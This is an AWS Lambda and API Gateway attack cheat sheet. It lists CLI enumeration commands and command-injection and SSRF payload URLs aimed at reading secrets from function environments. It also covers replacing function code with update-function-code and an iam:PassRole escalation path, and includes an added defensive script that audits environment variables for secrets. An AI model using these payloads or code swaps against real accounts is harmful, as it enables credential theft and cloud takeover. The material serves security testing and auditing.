Lambda Functions

Lambda Function exploits

AWS Lambda is a serverless compute service that runs code in response to events and manages the underlying compute resources automatically.

Enumeration

List of all lambda functions

aws lambda list-functions

Retrieve the information about the specified lambda function

aws lambda get-function --function-name [function-name]

Retrieve the policy information about the specified lambda function

aws lambda get-policy --function-name [function-name]

Retrieve the event source mapping information about the specified lambda function

aws lambda list-event-source-mappings --function-name [function-name]

List all the layers (dependencies) in the AWS account

aws lambda list-layers

Retrieve the full information about the specified layer name

aws lambda get-layer-version --layer-name [layername] --version-number [version-number]

REST API Gateway

List of all the REST APIs

aws apigateway get-rest-apis

Get the information about specified API

aws apigateway get-rest-api --rest-api-id [api-id]

Get stages

aws apigateway get-stages --rest-api-id <rest-api-id> --profile <profile> --region <region>

List information about a collection of resources

aws apigateway get-resources --rest-api-id [api-id]

Get information about the specified resource

aws apigateway get-resource --rest-api-id [api-id] --resource-id [resource-id]

Get the method information for the specified resource

aws apigateway get-method --rest-api-id [api-id] --resource-id [resource-id] --http-method [method]

List of all stages for a REST API

aws apigateway get-stages --rest-api-id [api-id]

List all API keys, including their values

aws apigateway get-api-keys --include-values

Get the information about a specified API key

aws apigateway get-api-key --api-key [api-key]

Call a REST API

curl -X GET 'https://<rest-api>.execute-api.<region>.amazonaws.com/<stage-name>/<api-endpoint>' -H 'x-api-key: <api-key>' | jq

Credential Access

RCE

Lambda function vulnerable to command injection

Command Injection
https://vulnerable.lambda.amazonaws.com/prod/system?cmd=id
https://vulnerable.lambda.amazonaws.com/prod/system?cmd=env

SSRF

https://vulnerable.lambda.amazonaws.com/prod/vuln?url=http://localhost:9001/2025-05-15/runtime/invocation/next
https://vulnerable.lambda.amazonaws.com/prod/vuln?url=file://proc/self/environ

Using CLI

Environment variable:

aws lambda get-function --function-name [function-name]

One misconfiguration organizations often make with Lambda is including sensitive information in the function's environment variables.

aws lambda list-functions --profile [profile]
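An added example (not part of the original page): a defender-side audit for the misconfiguration described above, run over JSON in the shape that `aws lambda list-functions` returns. The sample listing, the function and variable names, and the heuristics (name patterns, value patterns, entropy threshold) are constructed assumptions for illustration.

```python
import json
import math
import re

# Constructed sample in the shape `aws lambda list-functions` returns; all values are fake.
SAMPLE = json.loads("""
{"Functions": [
  {"FunctionName": "orders-api", "Environment": {"Variables": {
     "LOG_LEVEL": "info",
     "DB_PASSWORD": "example-only",
     "UPSTREAM": "https://svc:example-pass@db.example.internal/orders"}}},
  {"FunctionName": "thumbnailer", "Environment": {"Variables": {
     "AWS_KEY": "AKIAIOSFODNN7EXAMPLE",
     "UPLOAD_SIG": "wJalrXUtnFEMI/K7MDENG/bPxRfiCYEXAMPLEKEY"}}},
  {"FunctionName": "healthcheck"}
]}
""")

# Assumed heuristics: tune the patterns and threshold for your own environment.
NAME_HINT = re.compile(r"secret|passw(or)?d|token|api_?key|private_?key|credential", re.I)
VALUE_HINTS = {
    "aws-access-key-id": re.compile(r"\b(AKIA|ASIA)[0-9A-Z]{16}\b"),
    "private-key-block": re.compile(r"-----BEGIN [A-Z ]*PRIVATE KEY-----"),
    "url-with-password": re.compile(r"://[^/\s:@]+:[^/\s:@]+@"),
}
TOKEN_LIKE = re.compile(r"[A-Za-z0-9+/=_-]{32,}")

def entropy(s):
    """Shannon entropy in bits per character."""
    return -sum(s.count(c) / len(s) * math.log2(s.count(c) / len(s)) for c in set(s))

def audit(listing):
    """Return (function, variable, reasons) for variables that look like secrets."""
    findings = []
    for fn in listing.get("Functions", []):
        # Functions without variables have no "Environment" key at all.
        variables = fn.get("Environment", {}).get("Variables", {})
        for name, value in sorted(variables.items()):
            reasons = [label for label, rx in VALUE_HINTS.items() if rx.search(value)]
            if NAME_HINT.search(name) and value:
                reasons.append("sensitive-name")
            if TOKEN_LIKE.fullmatch(value) and entropy(value) >= 4.0:
                reasons.append("high-entropy")
            if reasons:
                findings.append((fn["FunctionName"], name, sorted(reasons)))
    return findings

if __name__ == "__main__":
    for function, variable, reasons in audit(SAMPLE):
        # Report names and reasons only; never echo the value itself.
        print(f"{function}: {variable} ({', '.join(reasons)})")
```

Findings from a check like this are candidates for moving into a secrets store and rotating; the report deliberately omits the values so it can be shared without spreading them further.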

Execute a lambda function

aws lambda invoke --function-name [FunctionName-Parameter] --payload '{}' output.txt --profile admin

Exploitation - update-function-code

zip <file name>.zip <file name>.py

aws lambda update-function-code --function-name <function name> --zip-file fileb://<zip file>.zip

aws lambda invoke --function-name <function name> output.json

cat output.json

Persistence

lambda:UpdateFunctionCode


PrivEsc

iam:PassRole + lambda:CreateFunction + lambda:InvokeFunction
